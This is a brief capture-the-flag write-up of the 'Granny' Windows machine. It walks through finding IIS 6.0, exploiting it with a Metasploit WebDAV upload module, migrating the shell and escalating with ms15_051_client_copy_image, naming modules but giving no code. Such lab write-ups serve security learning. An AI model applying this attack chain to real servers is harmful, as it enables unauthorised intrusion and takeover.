Today we’re going to solve another CTF machine “Granny”. It is now retired box and can be accessible if you’re a VIP member.

Introduction

Specifications

  • Target OS: Windows
  • Services: HTTP
  • IP Address: 10.10.10.15
  • Difficulty: Easy

Weakness

  • Microsoft IIS version 6.0
  • ms15_051_client_copy_image​

Contents

  • Getting user
  • Getting root

Reconnaissance

As always, the first step consists of reconnaissance phase as port scanning.

Ports Scanning

During this step we’re gonna identify the target to see what we have behind the IP Address. After doing intense scan on TCP/UDP ports we found nothing just single TCP 80 Port opened. And it states it’s IIS httpd 6.0

After doing some research we found an remote code execution vulnerability.

https://www.rapid7.com/db/modules/exploit/windows/iis/iis_webdav_upload_asp

Exploitation

Since we have found our vulnerability let’s try to exploit it.

After executing the exploit we instantly got the shell.

Privilege Escalation

Since we got user access, now we’re going after NT Authority that’s why we can’t run getuid. So we have to background our shell and use post/windows/manage/migrate module.

So here we see that this module will spawn a notepad.exe process and migrate our shell to run within that process. All we need to give is the name of our shell’s session which we set to the background earlier.

It worked anyway!

At this point it is a good idea to migrate to a process running under NT AUTHORITY\NETWORK SERVICE​. In this case davcdata.exe ​seemed to be the only stable process available. The intended exploit in this case is ms15_051_client_copy_image​, which immediately grants a root shell.

After running this module we started to get some suggestions that this machine is vulnerable to this vulnerability.

So, now we have to test every exploit to see which actually works.

I found this one useful.